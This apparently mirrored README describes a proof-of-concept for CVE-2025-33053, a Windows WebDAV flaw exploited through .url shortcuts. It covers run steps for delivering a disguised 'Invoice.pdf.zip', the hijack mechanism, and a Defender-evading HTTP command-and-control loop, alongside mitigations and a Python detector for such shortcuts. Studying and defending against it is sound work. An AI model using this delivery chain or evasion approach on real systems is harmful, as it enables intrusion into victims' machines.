Related vulnerability
Title:
Microsoft WebDAV security vulnerability
(CVE-2025-33053)
Description: Microsoft WebDAV is an HTTP-based extension from Microsoft (USA) used for file management and collaborative editing over the Internet. Microsoft WebDAV contains a security vulnerability that an attacker can exploit to execute code. The following products and versions are affected: Windows 11 Version 24H2 for ARM64-based Systems, Windows 11 Version 24H2 for x64-based Systems, Windows Server 2025, Windows 10 for 32-bit
Description
Proof-of-concept for CVE-2025-33053, exploiting WebDAV with `.url` file delivery to demonstrate realistic remote code execution. Includes a decoy PDF payload and a video-only showcase of potential command-and-control capabilities.
Introduction
# CVE-2025-33053 - WebDAV Remote Code Execution (RCE) PoC & C2 Simulation
> **⚠️ Educational Purposes Only**
> This project demonstrates a proof-of-concept exploiting WebDAV and `.url` file delivery to achieve realistic remote code execution. It includes a decoy-based executable and a controlled simulation of command-and-control (C2) capabilities. No malicious payloads are shared.
---
## 📜 Summary
This repository contains a PoC for **CVE-2025-33053**, a vulnerability in how Windows handles `.url` files pointing to a WebDAV share. The PoC demonstrates how an attacker could:
* Deliver a `.url` shortcut via ZIP (`Invoice.pdf.zip`)
* Trigger execution of a payload hosted on a WebDAV container
* Open a benign-looking PDF while executing malicious logic in the background
* Optionally simulate C2 behavior (e.g., creating folders)
> The actual C2 code is **not included**; only a demonstration video is provided.
---
## 🎬 Demo Videos
### 🔹 Video 1 — Decoy Execution
https://github.com/user-attachments/assets/27ada7f9-9b02-4281-b002-da7afcdffe21
Shows the `.url` file triggering `route.exe`, which opens a fake PDF and displays a popup:
> *"Execution complete. No alerts triggered. You may continue pretending you're safe."*
### 🔹 Video 2 — C2 Simulation
https://github.com/user-attachments/assets/d3908eb7-3126-4ec1-ae60-a0373b877a50
A very simple command-and-control mechanism. It simulates a stealthy C2 by executing remote commands (e.g., creating a folder, launching calc) fetched via HTTP. No shell, no noise, just silent control.
Reverse shells get captured and stopped by Microsoft Defender. Here, as you can see, I just edit a file that is accessible to the victim machine; the machine fetches it via HTTP, strips the content, and executes it. That task is handled by the custom `Route.exe`.
> ✅ Videos available in the `demo/` directory.
---
## 📂 File Structure
```
CVE-2025-33053/
├── docker-compose.yml          # WebDAV container config
├── setup_webdav_payload.py     # Automates setup + zipping
├── Important-Document.pdf.zip  # Contains the disguised .url (created by the script)
├── webdav_data/                # (created by the script)
│   └── data/payload/route.exe  # Payload (PDF + logic)
├── cleanup.sh                  # Docker + directories + webdav_data cleaner
└── demo/
    ├── 1_decoy_execution.mp4
    └── 2_c2_simulation.mp4
```
---
## 🧪 Running the PoC
1. **Clone the repo & navigate to it**
```bash
git clone https://github.com/kra1t0/CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept.git
cd CVE-2025-33053-WebDAV-RCE-PoC-and-C2-Concept
```
2. **Run setup script**
```bash
python3 setup_webdav_payload.py
```
> This sets up Docker, creates the folders, moves `pwned.exe`, generates the `.url`, and packages the `.zip`.
3. **Deliver the ZIP and open it on the target**
* `Invoice.pdf.zip` → the user opens/unzips it and double-clicks the `.url`
* Execution begins from WebDAV without any warnings (sometimes Microsoft Defender does alert that the file should be scanned by an admin)
---
## 🧱 Affected Versions
CVE-2025-33053 affects the following Windows versions:
* Windows 10 (1809 – 22H2)
* Windows 11 (21H2 – 23H2)
* Windows Server 2016 / 2019 / 2022
* Systems with the WebClient service enabled
* Systems where `.url` files are not blocked or sanitized

**🛠️ The vulnerability was patched in the June 2025 cumulative updates. You can find [patch links](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053) in the Microsoft Patch Notes.**
## 🧠 How It Works
1. **The Shortcut Trick** The `.url` file launches a trusted Windows utility (`iediagcmd.exe`) but sets its working directory to an attacker-controlled WebDAV share.
2. **DLL/Executable Hijack** That utility uses `Process.Start()` to run commands like `route.exe`. Windows looks first in the working directory, allowing the malicious binary from WebDAV to be executed.
3. **Stealth Falcon’s Delivery** In real attacks, APT actors zipped the `.url` into misleadingly named archives (e.g. `...pdf.zip`) and hosted them on trusted domains over HTTPS. The payload chain then delivered a decoy PDF and loaded a custom C2 loader (“Horus Agent”) capable of in-memory shellcode injection, process cloaking, and remote commands.
4. **Active Exploitation** The exploit was used in March 2025 against defense organizations in the Middle East. It’s high-impact (CVSS 8.8) and included in CISA’s Known Exploited Vulnerabilities catalog.
---
## 🛡️ Mitigation & Defense
| Mitigation Strategy | Description |
| ----------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------- |
| **🔄 Apply Microsoft Patch** | June 2025 cumulative updates address CVE‑2025‑33053 across Windows 10/11 and older Server versions. |
| **🔒 Disable WebDAV Client** | For systems without WebDAV needs (i.e. most modern setups), disable the “WebClient” service via Group Policy or registry. |
| **📥 Train Users to Avoid Suspicious Archives** | Don’t open `.url` files from ZIP/ISO emails, even if they appear document-like. |
| **🕵️♀️ Monitor WebDAV Traffic** | Look for outbound UNC connection patterns like `\\<host>@443\DavWWWRoot\...`; these may indicate exploitation attempts. |
| **🛠 Deploy WAF/IDS Rules** | Block WebDAV-related methods (e.g., `PROPFIND`) or UNC paths to untrusted domains. |
| **⚙️ Harden Edge/SmartScreen Policies** | Restrict handling of `.url` files and archives via browser settings or secure email gateways. |
> ✅ **Immediate priority**: install the patch — CISA requires federal agencies to remediate by July 1, 2025.
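Triage logic for the delivery pattern described in How It Works and for the gateway/monitoring rows of the table above: parse each `.url` inside a ZIP attachment and flag a WebDAV working directory or UNC target. This is an added example, not code from the PoC repository; the archive, the host `dav.example.invalid` and the executable name `trusted-utility.exe` are constructed, and the parser assumes the standard INI layout of Internet Shortcut files.

```python
import configparser
import io
import re
import zipfile

# UNC forms the WebClient service resolves over WebDAV: \\host@443\DavWWWRoot\..., \\host@SSL\...
WEBDAV_UNC = re.compile(r"^\\\\[^\\]+@(?:SSL|\d+)(?:\\|$)", re.IGNORECASE)
WEBDAV_MARKER = re.compile(r"DavWWWRoot|@SSL\b|@\d+\\", re.IGNORECASE)


def analyze_url_file(name: str, content: str) -> list[str]:
    """Return findings for one Internet Shortcut (.url) entry; an empty list means nothing suspicious."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(content)
    if not parser.has_section("InternetShortcut"):
        return ["not a valid InternetShortcut file"]
    sect = parser["InternetShortcut"]  # option names are case-insensitive in configparser
    target, workdir = sect.get("URL", ""), sect.get("WorkingDirectory", "")
    findings = []
    if WEBDAV_UNC.match(workdir) or WEBDAV_MARKER.search(workdir):
        findings.append(f"WorkingDirectory is a WebDAV share: {workdir}")
    if target.lower().startswith("file:") and workdir.startswith("\\\\"):
        findings.append("launches a local file with a remote working directory")
    if target.startswith("\\\\") or WEBDAV_MARKER.search(target):
        findings.append(f"URL targets a UNC/WebDAV path: {target}")
    if re.search(r"\.(pdf|docx?|xlsx?)\.url$", name, re.IGNORECASE):
        findings.append(f"document-like double extension: {name}")
    return findings


def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Map every .url member of a ZIP attachment to its findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".url"):
                text = zf.read(info).decode("utf-8", errors="replace")
                results[info.filename] = analyze_url_file(info.filename, text)
    return results


def build_sample_zip() -> bytes:
    """Constructed sample archive: one ordinary web bookmark and one WebDAV-style lure."""
    benign = "[InternetShortcut]\nURL=https://www.example.com/\n"
    lure = ("[InternetShortcut]\n"
            "URL=file:///C:/Windows/System32/trusted-utility.exe\n"  # hypothetical binary name
            "WorkingDirectory=\\\\dav.example.invalid@443\\DavWWWRoot\\share\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bookmark.url", benign)
        zf.writestr("Invoice.pdf.url", lure)
    return buf.getvalue()
```

Run `scan_zip(build_sample_zip())` to see the benign bookmark return no findings while the lure is flagged three times; the same `scan_zip` can be pointed at real attachments in a gateway or sandbox pipeline.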
---
## ❌ What’s NOT Included
* No C2 command server code
* No reverse shell scripts or malware
* No exploitation of real systems
---
## 🔗 References
* [Microsoft Patch Notes – June 2025](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053)
* [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
* [Elastic Threat Report: Stealth Falcon Exploitation](https://www.elastic.co/blog/stealth-falcon-campaign-2025)
* [CERT-EU Alert](https://cert.europa.eu/article/webdav-url-hijack-apt)
* [Microsoft Defender AV & SmartScreen Advisory](https://learn.microsoft.com/en-us/microsoft-365/security/)
---
Crafted with attention to realism, red team tradecraft, and ethical disclosure by [@kra1t0](https://github.com/kra1t0)
*Precision in Chaos*
File snapshot
[4.0K] /data/pocs/051891296626677ad2656a3ca3ac69fc81370746
├── [ 218] cleanup.sh
├── [4.0K] demo
│ ├── [2.1M] 1_decoy_execution.mkv
│ └── [6.2M] 2_c2_simulation.mkv
├── [ 566] docker-compose.yml
├── [7.1M] pwned.exe
├── [6.8K] README.md
└── [2.2K] setup_webdav_payload.py
1 directory, 7 files
Notes
1. It is recommended to access the original source first.
2. If the source has gone offline or cannot be reached, e-mail f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.